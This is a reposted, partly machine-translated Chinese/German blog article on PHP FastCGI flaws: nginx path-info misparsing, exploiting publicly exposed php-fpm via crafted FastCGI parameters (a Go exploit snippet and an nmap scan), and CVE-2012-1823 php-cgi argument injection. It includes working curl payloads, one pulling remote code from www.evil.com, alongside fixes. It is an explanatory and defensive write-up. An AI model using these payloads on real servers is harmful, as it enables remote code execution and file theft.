PHP FastCGI RCE Vul
Freigeben: 2016-08-08 09:21:01
Original
1531 Leute haben es durchsucht
Katalog1. Introduction
2. nginx文件类型错误解析漏洞
3. 针对直接公网开放的Fast-CGI攻击
4. 通过FCGI API动态修改php.ini中的配置实现RCE 1 EinführungLassen Sie uns zunächst die verwandten Konzepte von CGI klären
1. CGI
CGI是为了保证web server传递过来的数据是标准格式的,从本质上来说,它是一个协议标准。web server(例如nginx)只是内容的分发者。比如
1) 如果请求/index.html,那么web server会去文件系统中找到这个文件,发送给浏览器,这里分发的是静态数据
2) 如果请求的是/index.php,根据配置文件,nginx知道这个不是静态文件,需要去找PHP解析器来处理,那么他会把这个请求简单处理后交给PHP解析器
问题的核心在于Nginx需要传哪些数据给PHP解析器呢,例如
1) url
2) 查询字符串
3) POST数据
4) HTTP header
..
本质上CGI就是规定要传哪些数据、以什么样的格式传递给后方处理这个请求的协议,而对应的是,只要是遵循这个协议标准实现的程序,就可以称之为CGI程序
2. FastCGI
首先明确一点,FastCGI也同样是一个协议标准,FastCGI的设计目的是提高CGI程序的性能的
1) 首先,Fastcgi会先启一个master,解析配置文件,初始化执行环境
2) 然后再启动多个worker
3) 当请求过来时,master会传递给一个worker,然后立即可以接受下一个请求。这样就避免了重复的劳动,效率提高了
4) 而且当worker不够用时,master可以根据配置预先启动几个worker等着,同时如果发现空闲worker太多时,也会停掉一些,这样就提高了性能,也节约了资源
而对应的是,只要是遵循了这个协议标准实现的程序,就可以称之为FastCGI程序
3. PHP-CGI / PHP-FastCGI
PHP的解释器是PHP-CGI,PHP-CGI只是个CGI程序,他自己本身只能解析请求,返回结果,不会进程管理
4. PHP-FPM
PHP-FPM是PHP-CGI进程的管理器,用来管理PHP-CGI进程的,PHP-FPM的管理对象是PHP-CGI
0x1: PHP-FPMPHP-FPM-Funktionen umfassen
1. 支持平滑停止/启动的高级进程管理功能
2. 可以工作于不同的 uid/gid/chroot 环境下,并监听不同的端口和使用不同的 php.ini 配置文件(可取代 safe_mode 的设置)
3. stdout、stderr日志记录
4. 在发生意外情况的时候能够重新启动并缓存被破坏的 opcode
5. 文件上传优化支持
6. "慢日志" - 记录脚本(不仅记录文件名,还记录 PHP backtrace 信息,可以使用 ptrace或者类似工具读取和分析远程进程的运行数据)运行所导致的异常缓慢
7. fastcgi_finish_request() - 特殊功能:用于在请求完成和刷新数据后,继续在后台执行耗时的工作(录入视频转换、统计处理等)
8. 动态/静态子进程产生
9. 基本 SAPI 运行状态信息(类似Apache的 mod_status)
10. 基于 php.ini 的配置文件
Relevant
Link:http://php.net/manual/zh/install.fpm.configuration.php
http://php.net/manual/zh/install.fpm.php
http://segmentfault.com/q/1010000000256516 2. Nginx-Dateitypfehler Parsing-Schwachstelle 0x1: Beschreibung der Schwachstelle Einführung in die Schwachstelle: Nginx ist ein weit verbreiteter Hochleistungs-Webserver Häufig wird es als Reverse-Proxy eingesetzt und kann auch den Betrieb von PHP sehr gut unterstützen. Es gibt jedoch ein schwerwiegenderes Sicherheitsproblem. Standardmäßig kann der Server jede Art von Datei in PHP falsch analysieren. Dies führt zu schwerwiegenden Sicherheitsproblemen und ermöglicht es böswilligen Angreifern, Nginx-Server zu kompromittieren 0x2: Schwachstellenanalysenginx unterstützt PHP standardmäßig im CGI-Modus und ist in der Konfigurationsdatei wie folgt konfiguriert
location ~ .php$
{
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}
Die Konfigurationsparameter werden wie folgt kurz beschrieben 1. location对请求进行选择的时候会使用URI环境变量进行选择
1) 其中传递到后端Fastcgi的关键变量SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定
2) 而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的
2. 这里就是产生问题的点。而为了较好的支持PATH_INFO的提取,在PHP的配置选项里存在cgi.fix_pathinfo选项,其目的是为了从SCRIPT_FILENAME里取出真正的脚本名 Nehmen wir ein Angriffsszenario an
1. 假设存在一个URL: http://localhost/test/test.jpg2. 我们以如下的方式去访问: http://localhost/test/test.jpg/test.php3. nginx将会得到一个URI: /test.jpg/test.php
4. 经过location指令,该请求将会交给后端的fastcgi处理,nginx为其设置环境变量SCRIPT_FILENAME,内容为: /scripts/test.jpg/test.php
5. 后端的fastcgi在接受到该选项时,会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理,一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用,所以该选项一般配置开启。php通过该选项之后将查找其中真正的脚本文件名字,查找的方式也是查看文件是否存在,这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为
1) SCRIPT_FILENAME: /scripts/test.jpg
2) PATH_INFO: test.php
6. 最后,以/scripts/test.jpg作为此次请求需要执行的脚本,而nginx会使用php解析器来处理这个jpg文件,攻击者就可以实现让nginx以php来解析任何类型的文件了
Der Kern der Schwachstelle ist tatsächlich ein Problem, das durch das unterschiedliche Verständnis der Parameter auf Skriptpfadebene zwischen fcgi und Webserver verursacht wird. Dies ist ein typisches Problem, das durch unterschiedliche systemübergreifende Kontexte verursacht wird. Schwachstellen, die durch unterschiedliche Interpretationen von Anfragen verursacht werden. Seine Angriffsfläche ist Nginx0x3: POC Besuchen Sie eine Website, auf der Nginx PHP unterstützt , fügen Sie /test.php nach einer beliebigen Ressourcendatei wie robots.txt hinzu, und diese beliebige Ressourcendatei wird als PHP-Datei ausgeführt 0x4: Reparaturplan (Neustart erforderlich)
1. 修改php.ini配置
cgi.fix_pathinfo = 02. nginx配置文件中添加
if ( $fastcgi_script_name ~ ..*/.*php )
{
return403;
}
/*
考虑到MVC框架、用户自定义站点中有可能出现xxx/xx.php的情况,这个规则应该更加细粒度一点,例如*.jpg/.*php、*.txt/.*php
*/
In Darüber hinaus kann Nginx die Konfigurationsdatei ohne Neustart neu laden service nginx reload
//or
/etc/init.d/nginx reload0x5: Reparaturplan (Kein Neustart erforderlich) Die Voraussetzung ist, dass der Zielserver auch die Schwachstelle aufweist, dass die FCGI-API dem öffentlichen Netzwerk ausgesetzt ist. Verwenden Sie die Reparaturidee von Hotfix, nutzen Sie die Eigenschaften von FCGI selbst für RCE und verwenden Sie RCE zum Ändern it. FCGI-Schwachstelle für anfällige Maschinen 1. 利用FCGI RCE漏洞修改目标服务器的nginx配置文件的配置
if ( $fastcgi_script_name ~ ..*/.*php )
{
return403;
}
2. 利用FCGI RCE漏洞动态修改php.ini的值
cgi.fix_pathinfo = 0
Relevant
Link:http://www.80sec.com/nginx-securit.html
http://php.net/manual/zh/ini.core.php 3. 针对直接公网开放的Fast-CGI攻击除了利用nginx文件解析漏洞之外,由于fcgi和webserver是通过网络进行沟通的,因此目前越来越多的集群将fcgi直接绑定在公网上,所有人都可以对其进行访问。这样就意味着,任何人都可以伪装成webserver,让fcgi执行我们想执行的脚本内容。我们以php-fpm(php的fast-cgi的实现)作为例子说明直接将fastcgi暴露在公网所带来的安全风险0x1: 受影响范围扫描/*
1. php-fpm默认监听的端口是9000
2. 使用sV的原因是,因为9000端口可能还存在其他服务,这里需要借用nmap的指纹识别先帮我们鉴定一下
*/
nmap -sV -p 9000 --open 173.xxx.xxx.1/240x2: fcgi劫持POC因为webserver为了提供fastcgi一些参数,每次转发请求的时候,会通过FASTCGI_PARAMS的包向fcgi进程进行传递。本来这些参数是用户不可控的,但是既然这个fcgi对外开放,那么也就说明我们可以通过设定这些参数,来让我们去做一些原本做不到的事情
./fcgi_exp read 173.xxx.xxx.1839000 /etc/issue
/*
1. 在FASTCGI_PARAMS中,设定DOCUMENT_ROOT为"/"根目录
2. 设置SCRIPT_FILENAME为/etc/issue
3. 这样,只要我们有权限,我们就可以控制fcgi去读取这台机器上的任意文件了。实际上这并不是读取,而是用php去执行它
*/
fcgi_exp.go
..
env := make(map[string]string)
env["SCRIPT_FILENAME"] = url
env["DOCUMENT_ROOT"] = "/"
env["SERVER_SOFTWARE"] = "go / fcgiclient "
env["REMOTE_ADDR"] = "127.0.0.1"
env["SERVER_PROTOCOL"] = "HTTP/1.1"if len(reqParams) != 0{
env["CONTENT_LENGTH"] = strconv.Itoa(len(reqParams))
env["REQUEST_METHOD"] = "POST"
env["PHP_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off\nauto_prepend_file = php://input"
}
else{
env["REQUEST_METHOD"] = "GET"
}
..
0x3: 攻击向量
1. 类似于一个普通的LFI漏洞,如果你知道这台机器上的log路径,或者任何你可以控制内容的文件路径,你就可以执行任意代码了
//将LFI漏洞转化为RCE的相关知识,请参阅另一篇文章: http://www.cnblogs.com/LittleHann/p/3665062.html2. 动态修改php.ini中的auto_prepend_file的值,去远程执行任意文件。将一个LFI的漏洞变成了RFI
0x4: 修复方案1. 不要把fcgi接口对公网暴露
2. 对fcgi会添加身份认证机制 4. 通过FCGI API动态修改php.ini中的配置实现RCE0x1: 攻击向量通用通过设置FASTCGI_PARAMS,我们可以利用PHP_ADMIN_VALUE和PHP_VALUE去动态修改php的设置env["REQUEST_METHOD"] = "POST"env["PHP_VALUE"] = "auto_prepend_file = php://input"env["PHP_ADMIN_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off"利用执行php://input,然后在POST的内容中写入我们的php代码,这样就可以直接执行了./fcgi_exp system 127.0.0.19000 /tmp/a.php "id; uname -a"0x2: POC
1. 本地包含直接执行代码:
curl -H "USER-AGENT: " http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 2. 远程包含执行代码:
curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt
//-d参数: 作用是给php定义一个ini的值
0x2: 修复方案1. 不要把fcgi接口对公网暴露(重要)
2. 对fcgi会添加身份认证机制
3. 升级php cgiRelevant
Link:http://zone.wooyun.org/content/1060
http://zone.wooyun.org/content/151
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
以上就介绍了PHP FastCGI RCE Vul,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Neueste Artikel des Autors
-
2024-10-22 09:46:29
-
2024-10-13 13:53:41
-
2024-10-12 12:15:51
-
2024-10-11 22:47:31
-
2024-10-11 19:36:51
-
2024-10-11 15:50:41
-
2024-10-11 15:07:41
-
2024-10-11 14:21:21
-
2024-10-11 12:59:11
-
2024-10-11 12:17:31